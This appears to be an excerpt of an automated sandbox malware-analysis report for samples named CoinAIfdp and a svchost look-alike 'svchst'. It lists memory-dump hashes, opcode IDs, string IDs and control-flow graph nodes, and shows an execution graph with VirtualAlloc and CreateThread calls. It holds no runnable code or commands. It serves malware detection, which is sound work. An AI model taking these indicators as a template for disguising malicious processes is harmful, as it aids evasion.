                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 745328576358eb3b73a12f03f8dbd1334a6206874bf5fd84bf83357e68215888
                                        • Instruction ID: bd647ee6fd50bb2ddc9e3c0c20eef0cf0d6bfc4e7de913e9b02daa98d17443ba
                                        • Opcode Fuzzy Hash: 745328576358eb3b73a12f03f8dbd1334a6206874bf5fd84bf83357e68215888
                                        • Instruction Fuzzy Hash: 67D05EB1C092499FCB50EFA5A90866CBFB4AB02205F1001EAD844223A0D7780A49DB95
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9976a6d53bc55b016b51921401eb5fab63983f1912af5fd919c1cd32db82eed8
                                        • Instruction ID: c536e8a0eb34085e27495f08245d300a04f421f7285ce849e443aefae66a410d
                                        • Opcode Fuzzy Hash: 9976a6d53bc55b016b51921401eb5fab63983f1912af5fd919c1cd32db82eed8
                                        • Instruction Fuzzy Hash: 6BD0A7FD0052B44EE71543A2B80AF603AFC5302308F0440A3D18C911F2C7A504CEC751
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c931ab6cf1a6abaa60bd084acfd72544a10dd73d65fc4f9fb38c13a2b9f33bbb
                                        • Instruction ID: 1b05bb2bb09c4317d407110996768c508a75729d315f4c618101f95c2a1669e5
                                        • Opcode Fuzzy Hash: c931ab6cf1a6abaa60bd084acfd72544a10dd73d65fc4f9fb38c13a2b9f33bbb
                                        • Instruction Fuzzy Hash: D7C08CB64142624FD6650FA0B8A87E43B706B43309F0415A3A80C904B18772088AC600
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ee952f93ae29b1a0b447bc639cabfd2bb3f66b026a007868a51a278b4d54de1
                                        • Instruction ID: 92571331b447c14b56f1db38a0aebdc20e41b47839c9060b4df6622e56626b39
                                        • Opcode Fuzzy Hash: 0ee952f93ae29b1a0b447bc639cabfd2bb3f66b026a007868a51a278b4d54de1
                                        • Instruction Fuzzy Hash: 7FB02B750013144FC1101B81BC0C73032AC7302309F401413500C5087087B0048CC190
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f29be8d6b2ad88418308122070fb680f08f6f131256dea4876ef28d17e840a9
                                        • Instruction ID: f6f16e9256f5686bdbacd8678675d2d18a74a66436cce67a47f0eb1c11296e80
                                        • Opcode Fuzzy Hash: 6f29be8d6b2ad88418308122070fb680f08f6f131256dea4876ef28d17e840a9
                                        • Instruction Fuzzy Hash: 96C012B0904218AFE710DB65CE88BBAB775ABC4308F008086A209F2120CB340CC98A24
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe2e66fc528113fccb10e61348901152b7e24f56ff2a2bd755705d0b4537cff7
                                        • Instruction ID: b310029a23189b3a39d8cd322f8a860b4629871ca31e0053f3feefcdcce99319
                                        • Opcode Fuzzy Hash: fe2e66fc528113fccb10e61348901152b7e24f56ff2a2bd755705d0b4537cff7
                                        • Instruction Fuzzy Hash: FFD0C93C805258CFDB10CF88D448B9CBBB1AB19315F51489BD405E2241C37188CC8F11
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d270662bf1f9c5d1afbce4b5c3ea2c8c34174a6f52d45af148f7ba2ced4f5c1a
                                        • Instruction ID: 415a3d7251ffcc8a6d17bf79772e4a77824f7c907adcc0ad1cfacb233237c6d9
                                        • Opcode Fuzzy Hash: d270662bf1f9c5d1afbce4b5c3ea2c8c34174a6f52d45af148f7ba2ced4f5c1a
                                        • Instruction Fuzzy Hash: C8C00278A46728CBEB218B10DC8CB9DBB75BB89705F204086D80D763A1C6701E88CF00
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06123189ef69ba70575165727c9fe87d2f58c4cf80138b9ecf957599a658e663
                                        • Instruction ID: 842fe4350a6532490b3e112ed45205c275ee313cf44bc59174ae2d330e9d11fe
                                        • Opcode Fuzzy Hash: 06123189ef69ba70575165727c9fe87d2f58c4cf80138b9ecf957599a658e663
                                        • Instruction Fuzzy Hash: 41C00239808228DFDF224B50CD88B9CBB75BB48305F104086941D762618A350998DF10
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 975eaaa37adc16c6ab2fc3c449e9aa1e77b5b17eccd78cb6019ed5788fd30a4a
                                        • Instruction ID: 0af487935e001dd043165e4d6d9da62319fbe2fb6f833ac5a3fa1aa1a2410a50
                                        • Opcode Fuzzy Hash: 975eaaa37adc16c6ab2fc3c449e9aa1e77b5b17eccd78cb6019ed5788fd30a4a
                                        • Instruction Fuzzy Hash: B0A022B30802000FC3A00B203C0C03CB238830B3023002C03B00C208208A3000000B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-3065217502
                                        • Opcode ID: 2c3276e20d98bd6b8dc444666a2e5f1a616c84f215a7f86c2b37dd9fdac74a77
                                        • Instruction ID: 6ab87fc87477b698e089a3334df4f3287d80943b014f6dacfc5efb5cf3043fde
                                        • Opcode Fuzzy Hash: 2c3276e20d98bd6b8dc444666a2e5f1a616c84f215a7f86c2b37dd9fdac74a77
                                        • Instruction Fuzzy Hash: F5F171B8A012288FDB64DF28C984B99B7B1FF88305F1091E9D90DA7355DB30AE85CF55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$:
                                        • API String ID: 0-931255965
                                        • Opcode ID: a83e52148087600b4721a9452683a09261e26e9a0506ced082b5aeb2cecd08e9
                                        • Instruction ID: 1c45549e63e2f76a21f6c34a24e57060a00b2cc6ca1d1d2b14374b7c8446e954
                                        • Opcode Fuzzy Hash: a83e52148087600b4721a9452683a09261e26e9a0506ced082b5aeb2cecd08e9
                                        • Instruction Fuzzy Hash: A041E374A11228CFDB28DF69D984AD9B7F2FB49341F1040E9E909A7754D7309E85CF41

                                        Execution Graph

                                        Execution Coverage:11.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:6
                                        Total number of Limit Nodes:0
                                        execution_graph 15431 48e3e18 15432 48e3e60 VirtualAlloc 15431->15432 15433 48e3ecc 15432->15433 15428 48e4040 15429 48e408d CreateThread 15428->15429 15430 48e410f 15429->15430

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 aaa204-aaa2ac 275 aaa2b2-aaa375 268->275 276 aaa384-aaa3cc 268->276 275->276 309 aaa377-aaa381 275->309 281 aaa54c-aaa600 276->281 282 aaa3d2-aaa414 276->282 311 aaa6bf-aaa6f9 281->311 312 aaa606-aaa6bd 281->312 290 aaa531-aaa540 282->290 291 aaa431-aaa440 290->291 292 aaa546-aaa547 290->292 296 aaa442 291->296 297 aaa447-aaa4b9 291->297 294 aaa886-aaa8db 292->294 314 aaab74-aaaba2 294->314 296->297 306 aaa4bb 297->306 307 aaa4c0-aaa526 297->307 306->307 344 aaa52b 307->344 345 aaa528 307->345 309->276 324 aaa700-aaa709 311->324 312->324 320 aaaba8-aaabaf 314->320 321 aaa8e0-aaa921 314->321 387 aaabb1 call aad4a8 320->387 388 aaabb1 call aad4b8 320->388 330 aaa92a-aaa92b 321->330 331 aaa923 321->331 328 aaa871-aaa880 324->328 325 aaabb7-aaabd3 348 aaabdb 325->348 328->294 333 aaa70e-aaa71d 328->333 343 aaab6e 330->343 331->330 335 aaa9aa-aaaa08 331->335 336 aaab2a-aaab63 331->336 337 aaab08-aaab1a 331->337 338 aaaa0d-aaaa72 331->338 339 aaa930-aaa942 331->339 340 aaaac1-aaab06 331->340 341 aaaa77-aaaabc 331->341 342 aaa955-aaa9a5 331->342 346 aaa71f 333->346 347 aaa724-aaa7a5 333->347 335->343 336->343 351 aaab1c 337->351 352 aaab21-aaab28 337->352 338->343 349 aaa949-aaa950 339->349 350 aaa944 339->350 340->343 341->343 342->343 343->314 344->290 345->344 346->347 377 aaa80c-aaa837 347->377 378 aaa7a7-aaa7d2 347->378 349->343 350->349 351->352 352->343 381 aaa839 377->381 382 aaa83e-aaa860 377->382 379 aaa7d9-aaa80a 378->379 380 aaa7d4 378->380 386 aaa86b 379->386 380->379 381->382 382->386 386->328 387->325 388->325
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|
                                        • API String ID: 0-1108525164
                                        • Opcode ID: 2ae6085623d92b81106b16307d20b794b06c65213f6bc722541c3bab645ae095
                                        • Instruction ID: cccba4d8de8814ef06cd76be0cd8ed76dc67f90886af6d8896e7e1e1a8f4749f
                                        • Opcode Fuzzy Hash: 2ae6085623d92b81106b16307d20b794b06c65213f6bc722541c3bab645ae095
                                        • Instruction Fuzzy Hash: 9442B3B4A04229CFCB64DF28C888B99B7B6FB89300F1081E9D54DA7355DB34AE81CF55
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd5223b10445166418e8ea1d35d6f62c189c873c6ed6aba87adbc1f8d9971f1c
                                        • Instruction ID: adabdbc2c5e6e7b7a7ee0a7d84e8c5d1ed6b1b9345bef4cdabda43e174681b67
                                        • Opcode Fuzzy Hash: bd5223b10445166418e8ea1d35d6f62c189c873c6ed6aba87adbc1f8d9971f1c
                                        • Instruction Fuzzy Hash: E7C1F2B0D06258CFDB24CFA9C944BDDBBF1AB4A310F1084A9D48EAB694D7749AC4CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 389 aab2c8-aab2ea 391 aab2ec 389->391 392 aab2f1-aab308 389->392 391->392 394 aab30b-aab311 392->394 395 aab31a-aab31b 394->395 396 aab313 394->396 397 aab330-aab336 395->397 396->395 396->397 398 aab4ea 396->398 399 aab33a-aab4d7 call aa7780 396->399 400 aab31d-aab324 396->400 401 aab337-aab338 396->401 403 aab4f3-aab50b 398->403 399->394 429 aab4dd-aab4e5 399->429 400->399 402 aab326-aab32e 400->402 401->397 402->394 403->394 407 aab511-aab517 403->407 407->394 429->394
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|$0L|
                                        • API String ID: 0-1544185575
                                        • Opcode ID: d4af39e2c571390011b14bfe70fd2f10b0eeffc431a785bd761f1f0d1898cdfa
                                        • Instruction ID: 44113a6be13ce9253e759f041b3e9ba8d3c4a3787e12e1c5b8d77e365713db42
                                        • Opcode Fuzzy Hash: d4af39e2c571390011b14bfe70fd2f10b0eeffc431a785bd761f1f0d1898cdfa
                                        • Instruction Fuzzy Hash: A361E774E01208DFCB44DFA9D498AEEBBF6EF89300F108469E505A7399DB385946CF61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 430 aa449b-aa44bb 432 aa44bd 430->432 433 aa44c2-aa44d4 430->433 432->433 435 aa44d7-aa44dd 433->435 436 aa44df 435->436 437 aa44e6-aa44e7 435->437 436->437 438 aa458b-aa45a5 436->438 439 aa455b-aa457a 436->439 440 aa4529-aa4530 436->440 441 aa44ec-aa4516 436->441 442 aa4643-aa4660 call aa5d70 436->442 443 aa4526-aa4527 436->443 437->438 466 aa45a8 call aa580f 438->466 467 aa45a8 call aa5820 438->467 439->435 451 aa4580-aa4586 439->451 444 aa451e-aa4525 440->444 445 aa4532-aa454c 440->445 441->444 454 aa4666-aa4693 442->454 443->444 445->435 452 aa454e-aa4556 445->452 451->435 452->435 454->441 461 aa4699-aa46a1 454->461 455 aa45ae-aa4630 455->435 464 aa4636-aa463e 455->464 461->435 464->435 466->455 467->455
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L|$0L|$0L|$D@|
                                        • API String ID: 0-2446597281
                                        • Opcode ID: 33e088f07af4e1c7d177d9489d6d80e8783406517ddadb7e5a4905d2e8baf797
                                        • Instruction ID: 9331263a1bde00ca0c062519299cca8e418ec79147ad74e84f355d1b5eb67696
                                        • Opcode Fuzzy Hash: 33e088f07af4e1c7d177d9489d6d80e8783406517ddadb7e5a4905d2e8baf797
                                        • Instruction Fuzzy Hash: 4D51F774D0064DCFDB04EFA9D855BEDBBB1FF89300F10802AE605A7294DB785A86CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 468 aa44a0-aa44bb 469 aa44bd 468->469 470 aa44c2-aa44d4 468->470 469->470 472 aa44d7-aa44dd 470->472 473 aa44df 472->473 474 aa44e6-aa44e7 472->474 473->474 475 aa458b-aa45a5 473->475 476 aa455b-aa457a 473->476 477 aa4529-aa4530 473->477 478 aa44ec-aa4516 473->478 479 aa4643-aa4660 call aa5d70 473->479 480 aa4526-aa4527 473->480 474->475 503 aa45a8 call aa580f 475->503 504 aa45a8 call aa5820 475->504 476->472 488 aa4580-aa4586 476->488 481 aa451e-aa4525 477->481 482 aa4532-aa454c 477->482 478->481 491 aa4666-aa4693 479->491 480->481 482->472 489 aa454e-aa4556 482->489 488->472 489->472 491->478 498 aa4699-aa46a1 491->498 492 aa45ae-aa4630 492->472 501 aa4636-aa463e 492->501 498->472 501->472 503->492 504->492
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L|$0L|$0L|$D@|
                                        • API String ID: 0-2446597281
                                        • Opcode ID: 173c4a61566bcc887ad7e5b2b7bb74589fd012296679971954a59965a1312944
                                        • Instruction ID: d10da71a71ae5df8e190bb3f8bf26ce2eb407da1610bbce491d3176ce723e955
                                        • Opcode Fuzzy Hash: 173c4a61566bcc887ad7e5b2b7bb74589fd012296679971954a59965a1312944
                                        • Instruction Fuzzy Hash: 1B510774D0464DCFDB00EFA9D855BEDBBB1FF89300F10802AE509A7294DB789985CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: c065184cefab8928eb6c45c01e9afa5097669d735a3e6b4dfc5dfb3eb959355c
                                        • Instruction ID: ca09b4dc206a600218e071445a621477e60e6921aac7c3a0045c9cdb323cfbac
                                        • Opcode Fuzzy Hash: c065184cefab8928eb6c45c01e9afa5097669d735a3e6b4dfc5dfb3eb959355c
                                        • Instruction Fuzzy Hash: F5F0A574C00228DFCB218F90D9887D8BBB1BB1E301F0044D9D649A3260C7B95EC4DF60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tq|
                                        • API String ID: 0-4217580254
                                        • Opcode ID: d45755ff36bb5e10511d3debcba2a74fd5e4f1d3bb9fa51410eeed319563670b
                                        • Instruction ID: 5acfe73f551ad66fbb5c5cc8c46f6c95a2d6955a6d9fd8ccae4bacc8c0678ccf
                                        • Opcode Fuzzy Hash: d45755ff36bb5e10511d3debcba2a74fd5e4f1d3bb9fa51410eeed319563670b
                                        • Instruction Fuzzy Hash: BAD0177280120CEFDB04DFA4D804A9AB7F8EB8A301F8045FDA405D3260EB756E44EB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: cabde160ea360f387fd6723b23b2ae1535376c37eafcc6fdcc83bccbd68d0c23
                                        • Instruction ID: 533abfb96c01327a1f54227aea665aad7727b649d981a414176e442ce8aa8bc4
                                        • Opcode Fuzzy Hash: cabde160ea360f387fd6723b23b2ae1535376c37eafcc6fdcc83bccbd68d0c23
                                        • Instruction Fuzzy Hash: B7D0C97090521A8BDB14CB1084487D976B0BB44340F1040E5D04CA7245D3740AC05F40
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3540d21b63087f87694da47118c155309040707f2a81483896f42202352107f
                                        • Instruction ID: 5f9cf5a4ced4aeed7580c0ba45983dfb9f34cb30cf2df9a7fa7a388811888fad
                                        • Opcode Fuzzy Hash: b3540d21b63087f87694da47118c155309040707f2a81483896f42202352107f
                                        • Instruction Fuzzy Hash: 61B1C1B4906258CFDB60CFA4C984BDDBBF0AB4A314F119499D48EAB691D7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8abe23522c7a991837f76e3e937579e08ab33516185562dbc4d887d0c80d800
                                        • Instruction ID: 1082a224a48a5af73370f050c18f8a5951297848a5799cb3fb77590cf0aabc28
                                        • Opcode Fuzzy Hash: e8abe23522c7a991837f76e3e937579e08ab33516185562dbc4d887d0c80d800
                                        • Instruction Fuzzy Hash: 9DA1B0B4906258CFDB50CFA4C984BDDBBF0AB4A314F119499D48EAB695C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4720070afa69e95867e6beea63c56ee2db7f30b14b808ac93ab55e43b0628633
                                        • Instruction ID: 74765dd529ed77f2f301eb1e496a8c14c6bad903d7ad818959bd0c57d74957b0
                                        • Opcode Fuzzy Hash: 4720070afa69e95867e6beea63c56ee2db7f30b14b808ac93ab55e43b0628633
                                        • Instruction Fuzzy Hash: 2221D6B4D08219CFDB04CFA9D8447EEBFB2AB8E300F10846AD515A3290D7794A56DBA5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c93bf7935a4d467075d8835085aa4f298b11c4e57f2f7e84f185267fa25bfac1
                                        • Instruction ID: a26b059b314222bc75b704eb4d3aa16aa7282d0cc07797cef337c62163277820
                                        • Opcode Fuzzy Hash: c93bf7935a4d467075d8835085aa4f298b11c4e57f2f7e84f185267fa25bfac1
                                        • Instruction Fuzzy Hash: A7212770D05209CFEB04CFA9D8486EEBBF1AB8E311F10846AD456B36A0D7781A45CFA1
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3b9ced68069de338e868731ef8b6dc276cd898bd839e1afb19283ace9aaaa96
                                        • Instruction ID: d1d55dd7b2a37999f174d0240a2d318afb37a0728cadecb306434fe3f15f95e2
                                        • Opcode Fuzzy Hash: a3b9ced68069de338e868731ef8b6dc276cd898bd839e1afb19283ace9aaaa96
                                        • Instruction Fuzzy Hash: B32107B4D04219CFDB04CFA9D8447EEBBF5BB8D300F109429D519A3290DB785A81CFA5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3353d39e5448818a9ed33161c9c8f48d6ed78b116488270b159a6e4b9e36dcde
                                        • Instruction ID: 48db983f0d11ecee205db0af3b5a546b837ebae1c6bae0b907728fdee45ca6f1
                                        • Opcode Fuzzy Hash: 3353d39e5448818a9ed33161c9c8f48d6ed78b116488270b159a6e4b9e36dcde
                                        • Instruction Fuzzy Hash: 89210670D01219CFDB04CFAAD8446EEBBF1AB8D311F10842AD856B3690D7781A44CFA5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66a1cfccae9384c25fa474392bb9f042704113c384171f4f94b22a59df38d10f
                                        • Instruction ID: 2040f80b54227ed6ffca8139a1291bb4f4dc5aeaf6e39396f3df81def19909db
                                        • Opcode Fuzzy Hash: 66a1cfccae9384c25fa474392bb9f042704113c384171f4f94b22a59df38d10f
                                        • Instruction Fuzzy Hash: 5D215C74E0821A8FDB44CF99D844AEFBBF6BB89311F14846AD504B3290D7344945CBA4
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4dd58266f33c08fec7e28c48526691f8d102522a97a0c187dc5c6a5b084be49a
                                        • Instruction ID: 7fbe3dfa23b3d2d4cbe811648cae966354ecdd90be1b22b73ce15825a68085e5
                                        • Opcode Fuzzy Hash: 4dd58266f33c08fec7e28c48526691f8d102522a97a0c187dc5c6a5b084be49a
                                        • Instruction Fuzzy Hash: 0711E9B0D08209EFDB00DFA998447DEFBF6FB4A300F2084AAE415E3290E77596848B45
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f6ebc0d29cf0d8140af7ef2f2f443ed664a4b9c34058cfbabc60aee330e013d
                                        • Instruction ID: 14fda1812f0f91a80c89a67a4b5956336e4c98cf5faa07da1f6dabaa1f58fcb6
                                        • Opcode Fuzzy Hash: 2f6ebc0d29cf0d8140af7ef2f2f443ed664a4b9c34058cfbabc60aee330e013d
                                        • Instruction Fuzzy Hash: 1A11C5B0D08209DFDB04DFA9D944BEEBBF5FB4A300F20C4AAE415E3290E77596848A05
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e0628ce7ca075e3f1c676214040c3ce64c96ef709a8f09066d70cba32c81dc0
                                        • Instruction ID: 975434e1c11c647d5daf44a816a68b87a61f5e3651a8bf943fa5adbb7d2659bb
                                        • Opcode Fuzzy Hash: 8e0628ce7ca075e3f1c676214040c3ce64c96ef709a8f09066d70cba32c81dc0
                                        • Instruction Fuzzy Hash: BE011374D00208CBDF04DFA9D6186ECBBF6BB8E300F24402AD405B7290DB366E469B28
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8af7e9feb4cbf0d28f1cbe63958d34c4d02a1207c60cef3577c6207586483468
                                        • Instruction ID: 415adb2e132d5d536250d9f3b5efa47d138fec7a12bda5f5fffa971c81f66e21
                                        • Opcode Fuzzy Hash: 8af7e9feb4cbf0d28f1cbe63958d34c4d02a1207c60cef3577c6207586483468
                                        • Instruction Fuzzy Hash: B8F08B70809194DBDB00DBB8D8156ECBBB4AB4F300F04803CC504672A1CB3595069B92
                                        Memory Dump Source
